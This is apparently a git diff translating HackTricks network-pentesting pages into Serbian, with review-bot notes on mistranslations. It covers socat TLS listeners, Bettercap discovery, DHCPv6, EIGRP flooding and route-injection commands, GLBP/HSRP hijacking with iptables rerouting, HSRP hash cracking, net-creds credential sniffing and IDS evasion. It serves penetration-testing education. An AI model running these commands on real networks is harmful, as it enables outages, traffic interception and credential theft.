pristupa "važnom" domenu, on će mu pristupiti putem HTTPS. 
Takođe, obratite pažnju da unapred sačuvana pravila i druga generisana pravila mogu koristiti oznaku** [**`includeSubdomains`**](https://hstspreload.appspot.com) **tako da** _**wwww.facebook.com**_ **primer iz prethodnog neće više raditi jer** _**facebook.com**_ **koristi HSTS sa `includeSubdomains`.** TODO: easy-creds, evilgrade, metasploit, factory -## TCP listen in port - +## TCP slušanje na portu ```bash sudo nc -l -p 80 socat TCP4-LISTEN:80,fork,reuseaddr - ``` +## TCP + SSL slušanje na portu -## TCP + SSL listen in port - -#### Generate keys and self-signed certificate - +#### Generišite ključeve i samopotpisani sertifikat ``` FILENAME=server # Generate a public/private key pair: 
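Review bot: the HSTS-bypass note links `[http://www.faceook.com](http://www.faceook.com)` in both the removed and the added line; "faceook" is a typo for `www.facebook.com`, and since the point of the paragraph is that the victim must first request the plain-HTTP `www.facebook.com` page, the typo changes the meaning. Suggest `[http://www.facebook.com](http://www.facebook.com)` in the translated line. The rest of the hunk (the `includeSubdomains` explanation and the untranslated `TODO:` line) reads fine.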
@@ -817,26 +725,20 @@ openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt # Generate the PEM file by just appending the key and certificate files: cat $FILENAME.key $FILENAME.crt >$FILENAME.pem ``` - -#### Listen using certificate - +#### Slušanje pomoću sertifikata ``` sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 - ``` - -#### Listen using certificate and redirect to the hosts - +#### Slušanje koristeći sertifikat i preusmeravanje na hostove ``` sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0 ``` +Ponekad, ako klijent proveri da li je CA validan, možete **poslužiti sertifikat drugog imena hosta potpisan od strane CA**.\ +Još jedan zanimljiv test je da poslužite **sertifikat traženog imena hosta, ali samopotpisan**. -Some times, if the client checks that the CA is a valid one, you could **serve a certificate of other hostname signed by a CA**.\ -Another interesting test, is to serve a c**ertificate of the requested hostname but self-signed**. - -Other things to test is to try to sign the certificate with a valid certificate that it is not a valid CA. Or to use the valid public key, force to use an algorithm as diffie hellman (one that do not need to decrypt anything with the real private key) and when the client request a probe of the real private key (like a hash) send a fake probe and expect that the client does not check this. +Druge stvari koje treba testirati su pokušaj potpisivanja sertifikata sa validnim sertifikatom koji nije validan CA. Ili koristiti validni javni ključ, primorati korišćenje algoritma kao što je diffie hellman (onog koji ne zahteva dešifrovanje bilo čega sa pravim privatnim ključem) i kada klijent zatraži probe pravog privatnog ključa (kao što je hash) poslati lažnu probu i očekivati da klijent to ne proveri. 
## Bettercap - ```bash # Events events.stream off #Stop showing events @@ -862,20 +764,19 @@ set wifi.ap.channel 5 set wifi.ap.encryption false #If true, WPA2 wifi.recon on; wifi.ap ``` +### Beleške o aktivnom otkrivanju -### Active Discovery Notes +Imajte na umu da kada se UDP paket pošalje uređaju koji nema traženi port, šalje se ICMP (Port Unreachable). -Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent. +### **ARP otkrivanje** -### **ARP discover** - -ARP packets are used to discover wich IPs are being used inside the network. The PC has to send a request for each possible IP address and only the ones that are being used will respond. +ARP paketi se koriste za otkrivanje koji IP-ovi se koriste unutar mreže. PC mora poslati zahtev za svaku moguću IP adresu, a samo oni koji se koriste će odgovoriti. ### **mDNS (multicast DNS)** -Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp.local** the machine that see this paket usually answer this request. Then, it only searchs for machine answering to "services". +Bettercap šalje MDNS zahtev (svakih X ms) tražeći **\_services\_.dns-sd.\_udp.local**; mašina koja vidi ovaj paket obično odgovara na ovaj zahtev. Zatim, samo traži mašine koje odgovaraju na "services". -**Tools** +**Alati** - Avahi-browser (--all) - Bettercap (net.probe.mdns) 
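Review bot: in the certificate-testing paragraph of the `@@ -817,26` hunk, `kada klijent zatraži probe pravog privatnog ključa (kao što je hash) poslati lažnu probu` carries over "probe" from the English, but what is meant is a proof of possession of the private key (in a DHE handshake, the signature over the ephemeral DH parameters): `dokaz posedovanja pravog privatnog ključa ... poslati lažan dokaz` (a bogus signature) and expect that the client does not verify it. The sentence would also read better split in two: first the test with a certificate signed by a valid certificate that is not a CA, then the DH trick that reuses the real public key with a forged signature.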
@@ -883,26 +784,23 @@ Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp ### **NBNS (NetBios Name Server)** -Bettercap broadcast packets to the port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA". +Bettercap emituje pakete na port 137/UDP tražeći ime "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA". ### **SSDP (Simple Service Discovery Protocol)** -Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 1900). +Bettercap emituje SSDP pakete tražeći sve vrste usluga (UDP Port 1900). ### **WSD (Web Service Discovery)** -Bettercap broadcast WSD packets searching for services (UDP Port 3702). +Bettercap emituje WSD pakete tražeći usluge (UDP Port 3702). -## References +## Reference - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -- **Network Security Assessment: Know Your Network (3rd edition)** -- **Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood** +- **Procena bezbednosti mreže: Poznaj svoju mrežu (3. izdanje)** +- **Praktično hakovanje IoT-a: Definitivni vodič za napad na Internet stvari. Autor: Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood** - [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../banners/hacktricks-training.md}} 
diff --git a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index 9dcab7fc1..961e12978 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -1,10 +1,10 @@ {{#include ../../banners/hacktricks-training.md}} -### DHCPv6 vs. DHCPv4 Message Types Comparison +### Poređenje tipova poruka DHCPv6 i DHCPv4 -A comparative view of DHCPv6 and DHCPv4 message types is presented in the table below: +Uporedni pregled tipova poruka DHCPv6 i DHCPv4 prikazan je u tabeli ispod: -| DHCPv6 Message Type | DHCPv4 Message Type | +| Tip poruke DHCPv6 | Tip poruke DHCPv4 | | :--------------------------------- | :------------------ | | Solicit (1) | DHCPDISCOVER | | Advertise (2) | DHCPOFFER | 
@@ -17,23 +17,23 @@ A comparative view of DHCPv6 and DHCPv4 message types is presented in the table | Reconfigure (10) | DHCPFORCERENEW | | Relay-Forw (12), Relay-Reply (13) | none | -**Detailed Explanation of DHCPv6 Message Types:** +**Detaljno objašnjenje tipova poruka DHCPv6:** -1. **Solicit (1)**: Initiated by a DHCPv6 client to find available servers. -2. **Advertise (2)**: Sent by servers in response to a Solicit, indicating availability for DHCP service. -3. **Request (3)**: Clients use this to request IP addresses or prefixes from a specific server. -4. **Confirm (4)**: Used by a client to verify if the assigned addresses are still valid on the network, typically after a network change. -5. **Renew (5)**: Clients send this to the original server to extend address lifetimes or update configurations. -6. **Rebind (6)**: Sent to any server to extend address lifetimes or update configurations, especially when no response is received to a Renew. -7. **Reply (7)**: Servers use this to provide addresses, configuration parameters, or to acknowledge messages like Release or Decline. -8. **Release (8)**: Clients inform the server to stop using one or more assigned addresses. -9. **Decline (9)**: Sent by clients to report that assigned addresses are in conflict on the network. -10. **Reconfigure (10)**: Servers prompt clients to initiate transactions for new or updated configurations. -11. **Information-Request (11)**: Clients request configuration parameters without IP address assignment. -12. **Relay-Forw (12)**: Relay agents forward messages to servers. -13. **Relay-Repl (13)**: Servers reply to relay agents, who then deliver the message to the client. +1. **Solicit (1)**: Pokreće ga DHCPv6 klijent da pronađe dostupne servere. +2. **Advertise (2)**: Šalje ga server u odgovoru na Solicit, ukazujući na dostupnost za DHCP uslugu. +3. **Request (3)**: Klijenti koriste ovo da zatraže IP adrese ili prefikse od određenog servera. +4. 
**Confirm (4)**: Koristi ga klijent da proveri da li su dodeljene adrese još uvek važeće na mreži, obično nakon promene mreže. +5. **Renew (5)**: Klijenti šalju ovo originalnom serveru da produže trajanje adresa ili ažuriraju konfiguracije. +6. **Rebind (6)**: Šalje se bilo kojem serveru da produži trajanje adresa ili ažurira konfiguracije, posebno kada nije primljen odgovor na Renew. +7. **Reply (7)**: Serveri koriste ovo da pruže adrese, parametre konfiguracije ili da potvrde poruke poput Release ili Decline. +8. **Release (8)**: Klijenti obaveštavaju server da prestane da koristi jednu ili više dodeljenih adresa. +9. **Decline (9)**: Šalje ga klijent da prijavi da su dodeljene adrese u sukobu na mreži. +10. **Reconfigure (10)**: Serveri podstiču klijente da započnu transakcije za nove ili ažurirane konfiguracije. +11. **Information-Request (11)**: Klijenti traže parametre konfiguracije bez dodeljivanja IP adrese. +12. **Relay-Forw (12)**: Relay agenti prosleđuju poruke serverima. +13. **Relay-Repl (13)**: Serveri odgovaraju relay agentima, koji zatim dostavljaju poruku klijentu. -## References +## Reference - [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages) diff --git a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index fe4b7247a..183376ce3 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md 
@@ -1,61 +1,61 @@ -# EIGRP Attacks +# EIGRP Napadi {{#include ../../banners/hacktricks-training.md}} -**This is a summary of the attacks exposed in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Check it for further information. +**Ovo je sažetak napada izloženih u** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Proverite za dodatne informacije. -## **Fake EIGRP Neighbors Attack** +## **Napad lažnih EIGRP suseda** -- **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack. -- **Tool**: **helloflooding.py** script. -- **Execution**: - %%%bash - ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 - %%% -- **Parameters**: - - `--interface`: Specifies the network interface, e.g., `eth0`. - - `--as`: Defines the EIGRP autonomous system number, e.g., `1`. - - `--subnet`: Sets the subnet location, e.g., `10.10.100.0/24`. +- **Cilj**: Preopteretiti CPU rutera poplavom EIGRP hello paketa, što može dovesti do napada uskraćivanja usluge (DoS). +- **Alat**: **helloflooding.py** skripta. +- **Izvršenje**: +%%%bash +~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 +%%% +- **Parametri**: +- `--interface`: Određuje mrežni interfejs, npr., `eth0`. +- `--as`: Definiše broj autonomnog sistema EIGRP, npr., `1`. +- `--subnet`: Postavlja lokaciju podmreže, npr., `10.10.100.0/24`. -## **EIGRP Blackhole Attack** +## **EIGRP Crna rupa Napad** -- **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination. -- **Tool**: **routeinject.py** script. 
-- **Execution**: - %%%bash - ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 - %%% -- **Parameters**: - - `--interface`: Specifies the attacker’s system interface. - - `--as`: Defines the EIGRP AS number. - - `--src`: Sets the attacker’s IP address. - - `--dst`: Sets the target subnet IP. - - `--prefix`: Defines the mask of the target subnet IP. +- **Cilj**: Poremetiti protok mrežnog saobraćaja injektovanjem lažne rute, što dovodi do crne rupe gde se saobraćaj usmerava na nepostojeću destinaciju. +- **Alat**: **routeinject.py** skripta. +- **Izvršenje**: +%%%bash +~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 +%%% +- **Parametri**: +- `--interface`: Određuje interfejs napadačevog sistema. +- `--as`: Definiše EIGRP AS broj. +- `--src`: Postavlja IP adresu napadača. +- `--dst`: Postavlja IP adresu ciljne podmreže. +- `--prefix`: Definiše masku ciljne podmreže. -## **Abusing K-Values Attack** +## **Napad zloupotrebe K-vrednosti** -- **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack. -- **Tool**: **relationshipnightmare.py** script. -- **Execution**: - %%%bash - ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 - %%% -- **Parameters**: - - `--interface`: Specifies the network interface. - - `--as`: Defines the EIGRP AS number. - - `--src`: Sets the IP Address of a legitimate router. +- **Cilj**: Stvoriti kontinuirane prekide i ponovne veze unutar EIGRP domena injektovanjem izmenjenih K-vrednosti, što efektivno rezultira DoS napadom. +- **Alat**: **relationshipnightmare.py** skripta. +- **Izvršenje**: +%%%bash +~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 +%%% +- **Parametri**: +- `--interface`: Određuje mrežni interfejs. +- `--as`: Definiše EIGRP AS broj. 
+- `--src`: Postavlja IP adresu legitimnog rutera. -## **Routing Table Overflow Attack** +## **Napad preopterećenja tabele rutiranja** -- **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes. -- **Tool**: **routingtableoverflow.py** script. -- **Execution**: - %%%bash - sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 - %%% -- **Parameters**: - - `--interface`: Specifies the network interface. - - `--as`: Defines the EIGRP AS number. - - `--src`: Sets the attacker’s IP address. +- **Cilj**: Opteretiti CPU i RAM rutera poplavom tabele rutiranja brojnim lažnim rutama. +- **Alat**: **routingtableoverflow.py** skripta. +- **Izvršenje**: +%%%bash +sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 +%%% +- **Parametri**: +- `--interface`: Određuje mrežni interfejs. +- `--as`: Definiše EIGRP AS broj. +- `--src`: Postavlja IP adresu napadača. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index 77e1a445e..539b8c710 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -2,60 +2,56 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ## FHRP Hijacking Overview ### Insights into FHRP -FHRP is designed to provide network robustness by merging multiple routers into a single virtual unit, thereby enhancing load distribution and fault tolerance. Cisco Systems introduced prominent protocols in this suite, such as GLBP and HSRP. +FHRP je dizajniran da obezbedi robusnost mreže spajajući više rutera u jednu virtuelnu jedinicu, čime se poboljšava raspodela opterećenja i otpornost na greške. Cisco Systems je uveo istaknute protokole u ovom skupu, kao što su GLBP i HSRP. ### GLBP Protocol Insights -Cisco's creation, GLBP, functions on the TCP/IP stack, utilizing UDP on port 3222 for communication. Routers in a GLBP group exchange "hello" packets at 3-second intervals. If a router fails to send these packets for 10 seconds, it is presumed to be offline. However, these timers are not fixed and can be modified. +Cisco-ova kreacija, GLBP, funkcioniše na TCP/IP steku, koristeći UDP na portu 3222 za komunikaciju. Ruteri u GLBP grupi razmenjuju "hello" pakete na svakih 3 sekunde. Ako ruter ne pošalje ove pakete tokom 10 sekundi, smatra se da je van mreže. Međutim, ovi tajmeri nisu fiksni i mogu se modifikovati. ### GLBP Operations and Load Distribution -GLBP stands out by enabling load distribution across routers using a single virtual IP coupled with multiple virtual MAC addresses. In a GLBP group, every router is involved in packet forwarding. Unlike HSRP/VRRP, GLBP offers genuine load balancing through several mechanisms: +GLBP se izdvaja omogućavajući raspodelu opterećenja među ruterima koristeći jednu virtuelnu IP adresu u kombinaciji sa više virtuelnih MAC adresa. U GLBP grupi, svaki ruter učestvuje u prosleđivanju paketa. Za razliku od HSRP/VRRP, GLBP nudi pravu ravnotežu opterećenja kroz nekoliko mehanizama: -- **Host-Dependent Load Balancing:** Maintains consistent AVF MAC address assignment to a host, essential for stable NAT configurations. 
-- **Round-Robin Load Balancing:** The default approach, alternating AVF MAC address assignment among requesting hosts. -- **Weighted Round-Robin Load Balancing:** Distributes load based on predefined "Weight" metrics. +- **Host-Dependent Load Balancing:** Održava doslednu AVF MAC adresu dodeljenu hostu, što je bitno za stabilne NAT konfiguracije. +- **Round-Robin Load Balancing:** Podrazumevani pristup, naizmenično dodeljujući AVF MAC adrese među zahtevima hostova. +- **Weighted Round-Robin Load Balancing:** Raspodeljuje opterećenje na osnovu unapred definisanih "Weight" metrika. ### Key Components and Terminologies in GLBP -- **AVG (Active Virtual Gateway):** The main router, responsible for allocating MAC addresses to peer routers. -- **AVF (Active Virtual Forwarder):** A router designated to manage network traffic. -- **GLBP Priority:** A metric that determines the AVG, starting at a default of 100 and ranging between 1 and 255. -- **GLBP Weight:** Reflects the current load on a router, adjustable either manually or through Object Tracking. -- **GLBP Virtual IP Address:** Serves as the network's default gateway for all connected devices. +- **AVG (Active Virtual Gateway):** Glavni ruter, odgovoran za dodeljivanje MAC adresa peer ruterima. +- **AVF (Active Virtual Forwarder):** Ruter zadužen za upravljanje mrežnim saobraćajem. +- **GLBP Priority:** Metrika koja određuje AVG, počinje od podrazumevanih 100 i kreće se između 1 i 255. +- **GLBP Weight:** Odražava trenutno opterećenje na ruteru, može se prilagoditi ručno ili putem Object Tracking-a. +- **GLBP Virtual IP Address:** Služi kao podrazumevani prolaz mreže za sve povezane uređaje. -For interactions, GLBP employs the reserved multicast address 224.0.0.102 and UDP port 3222. Routers transmit "hello" packets at 3-second intervals, and are considered non-operational if a packet is missed over a 10-second duration. +Za interakcije, GLBP koristi rezervisanu multicast adresu 224.0.0.102 i UDP port 3222. 
Ruteri šalju "hello" pakete na svakih 3 sekunde, i smatraju se neoperativnim ako se paket propusti tokom 10 sekundi. ### GLBP Attack Mechanism -An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection. +Napadač može postati glavni ruter slanjem GLBP paketa sa najvišom prioritetnom vrednošću (255). To može dovesti do DoS ili MITM napada, omogućavajući presretanje ili preusmeravanje saobraćaja. ### Executing a GLBP Attack with Loki -[Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark. +[Loki](https://github.com/raizo62/loki_on_kali) može izvesti GLBP napad injektovanjem paketa sa prioritetom i težinom postavljenim na 255. Pre napada, koraci uključuju prikupljanje informacija kao što su virtuelna IP adresa, prisustvo autentifikacije i vrednosti prioriteta rutera koristeći alate kao što je Wireshark. Attack Steps: -1. Switch to promiscuous mode and enable IP forwarding. -2. Identify the target router and retrieve its IP. -3. Generate a Gratuitous ARP. -4. Inject a malicious GLBP packet, impersonating the AVG. -5. Assign a secondary IP address to the attacker's network interface, mirroring the GLBP virtual IP. -6. Implement SNAT for complete traffic visibility. -7. Adjust routing to ensure continued internet access through the original AVG router. +1. Prebacite se u promiscuous mode i omogućite IP prosleđivanje. +2. Identifikujte ciljni ruter i preuzmite njegovu IP adresu. +3. Generišite Gratuitous ARP. +4. Injektujte zlonamerni GLBP paket, pretvarajući se da ste AVG. +5. Dodelite sekundarnu IP adresu mrežnom interfejsu napadača, odražavajući GLBP virtuelnu IP. +6. 
Implementirajte SNAT za potpunu vidljivost saobraćaja. +7. Prilagodite rutiranje kako biste osigurali nastavak pristupa internetu kroz originalni AVG ruter. -By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data. - -For demonstration, here are the required command snippets: +Prateći ove korake, napadač se pozicionira kao "čovek u sredini", sposoban da presreće i analizira mrežni saobraćaj, uključujući nešifrovane ili osetljive podatke. +Za demonstraciju, evo potrebnih komandi: ```bash # Enable promiscuous mode and IP forwarding sudo ip link set eth0 promisc on 
@@ -69,78 +65,74 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo route del default sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` - Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network. -### Passive Explanation of HSRP Hijacking with Command Details +### Pasivno objašnjenje HSRP otmice sa detaljima komandi -#### Overview of HSRP (Hot Standby Router/Redundancy Protocol) +#### Pregled HSRP (Hot Standby Router/Redundancy Protocol) -HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management. +HSRP je Cisco-ov vlasnički protokol dizajniran za redundanciju mrežnih prolaza. Omogućava konfiguraciju više fizičkih rutera u jednu logičku jedinicu sa zajedničkom IP adresom. Ova logička jedinica se upravlja od strane primarnog rutera koji je odgovoran za usmeravanje saobraćaja. Za razliku od GLBP, koji koristi metrike poput prioriteta i težine za balansiranje opterećenja, HSRP se oslanja na jedan aktivni ruter za upravljanje saobraćajem. -#### Roles and Terminology in HSRP +#### Uloge i terminologija u HSRP -- **HSRP Active Router**: The device acting as the gateway, managing traffic flow. -- **HSRP Standby Router**: A backup router, ready to take over if the active router fails. -- **HSRP Group**: A set of routers collaborating to form a single resilient virtual router. -- **HSRP MAC Address**: A virtual MAC address assigned to the logical router in the HSRP setup. -- **HSRP Virtual IP Address**: The virtual IP address of the HSRP group, acting as the default gateway for connected devices. 
+- **HSRP Aktivni Ruter**: Uređaj koji deluje kao prolaz, upravljajući protokom saobraćaja. +- **HSRP Standby Ruter**: Rezervni ruter, spreman da preuzme ako aktivni ruter otkaže. +- **HSRP Grupa**: Skup rutera koji sarađuju kako bi formirali jedan otporniji virtuelni ruter. +- **HSRP MAC Adresa**: Virtuelna MAC adresa dodeljena logičkom ruteru u HSRP postavci. +- **HSRP Virtuelna IP Adresa**: Virtuelna IP adresa HSRP grupe, koja deluje kao podrazumevani prolaz za povezane uređaje. -#### HSRP Versions +#### HSRP Verzije -HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacity, multicast IP usage, and virtual MAC address structure. The protocol utilizes specific multicast IP addresses for service information exchange, with Hello packets sent every 3 seconds. A router is presumed inactive if no packet is received within a 10-second interval. +HSRP dolazi u dve verzije, HSRPv1 i HSRPv2, koje se razlikuju uglavnom u kapacitetu grupe, korišćenju multicast IP adresa i strukturi virtuelne MAC adrese. Protokol koristi specifične multicast IP adrese za razmenu informacija o usluzi, sa Hello paketima koji se šalju svake 3 sekunde. Ruter se smatra neaktivnim ako ne primi paket u intervalu od 10 sekundi. -#### HSRP Attack Mechanism +#### HSRP Mehanizam Napada -HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis. +HSRP napadi uključuju prisilno preuzimanje uloge Aktivnog Rutera ubrizgavanjem maksimalne vrednosti prioriteta. Ovo može dovesti do napada Man-In-The-Middle (MITM). Osnovni koraci pre napada uključuju prikupljanje podataka o HSRP postavci, što se može uraditi korišćenjem Wireshark-a za analizu saobraćaja. -#### Steps for Bypassing HSRP Authentication +#### Koraci za zaobilaženje HSRP Autentifikacije -1. 
Save the network traffic containing HSRP data as a .pcap file. - ```shell - tcpdump -w hsrp_traffic.pcap - ``` -2. Extract MD5 hashes from the .pcap file using hsrp2john.py. - ```shell - python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes - ``` -3. Crack the MD5 hashes using John the Ripper. - ```shell - john --wordlist=mywordlist.txt hsrp_hashes - ``` +1. Sačuvajte mrežni saobraćaj koji sadrži HSRP podatke kao .pcap datoteku. +```shell +tcpdump -w hsrp_traffic.pcap +``` +2. Izvucite MD5 heš vrednosti iz .pcap datoteke koristeći hsrp2john.py. +```shell +python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes +``` +3. Razbijte MD5 heš vrednosti koristeći John the Ripper. +```shell +john --wordlist=mywordlist.txt hsrp_hashes +``` -**Executing HSRP Injection with Loki** +**Izvršavanje HSRP Injekcije sa Lokijem** -1. Launch Loki to identify HSRP advertisements. -2. Set the network interface to promiscuous mode and enable IP forwarding. - ```shell - sudo ip link set eth0 promisc on - sudo sysctl -w net.ipv4.ip_forward=1 - ``` -3. Use Loki to target the specific router, input the cracked HSRP password, and perform necessary configurations to impersonate the Active Router. -4. After gaining the Active Router role, configure your network interface and IP tables to intercept the legitimate traffic. - ```shell - sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0 - sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE - ``` -5. Modify the routing table to route traffic through the former Active Router. - ```shell - sudo route del default - sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 - ``` -6. Use net-creds.py or a similar utility to capture credentials from the intercepted traffic. - ```shell - sudo python2 net-creds.py -i eth0 - ``` +1. Pokrenite Lokija da identifikujete HSRP oglase. +2. Postavite mrežni interfejs u promiscuous mode i omogućite IP prosleđivanje. 
+```shell +sudo ip link set eth0 promisc on +sudo sysctl -w net.ipv4.ip_forward=1 +``` +3. Koristite Lokija da ciljate specifični ruter, unesite razbijenu HSRP lozinku i izvršite potrebne konfiguracije da biste se pretvarali da ste Aktivni Ruter. +4. Nakon preuzimanja uloge Aktivnog Rutera, konfigurišite svoj mrežni interfejs i IP tabele da biste presreli legitimni saobraćaj. +```shell +sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0 +sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE +``` +5. Izmenite tabelu rutiranja da usmerite saobraćaj kroz bivšeg Aktivnog Rutera. +```shell +sudo route del default +sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 +``` +6. Koristite net-creds.py ili sličan alat za prikupljanje kredencijala iz presretnutog saobraćaja. +```shell +sudo python2 net-creds.py -i eth0 +``` -Executing these steps places the attacker in a position to intercept and manipulate traffic, similar to the procedure for GLBP hijacking. This highlights the vulnerability in redundancy protocols like HSRP and the need for robust security measures. +Izvršavanje ovih koraka stavlja napadača u poziciju da presreće i manipuliše saobraćajem, slično postupku za GLBP otmicu. Ovo naglašava ranjivost u protokolima redundancije poput HSRP i potrebu za robusnim bezbednosnim merama. -## References +## Reference - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index fd94988fa..4ca41753b 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,57 +1,45 @@ {{#include ../../banners/hacktricks-training.md}} -
+# **TTL Manipulacija** -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: +Pošaljite neke pakete sa TTL-om dovoljno visokim da stignu do IDS/IPS-a, ali ne dovoljno da stignu do konačnog sistema. Zatim, pošaljite još neke pakete sa istim sekvencama kao prethodni, tako da će IPS/IDS pomisliti da su to ponavljanja i neće ih proveravati, ali zapravo nose zlonamerni sadržaj. -{% embed url="https://academy.8ksec.io/" %} +**Nmap opcija:** `--ttlvalue ` -# **TTL Manipulation** +# Izbegavanje potpisa -Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content. +Jednostavno dodajte bespotrebne podatke u pakete kako bi se izbegao potpis IPS/IDS-a. -**Nmap option:** `--ttlvalue ` +**Nmap opcija:** `--data-length 25` -# Avoiding signatures +# **Fragmentirani Paketi** -Just add garbage data to the packets so the IPS/IDS signature is avoided. +Jednostavno fragmentirajte pakete i pošaljite ih. Ako IDS/IPS nema mogućnost da ih ponovo sastavi, stići će do konačnog hosta. -**Nmap option:** `--data-length 25` +**Nmap opcija:** `-f` -# **Fragmented Packets** +# **Nevažeći** _**checksum**_ -Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host. +Senzori obično ne računaju checksum iz razloga performansi. Tako da napadač može poslati paket koji će biti **interpretiran od strane senzora, ali odbijen od strane konačnog hosta.** Primer: -**Nmap 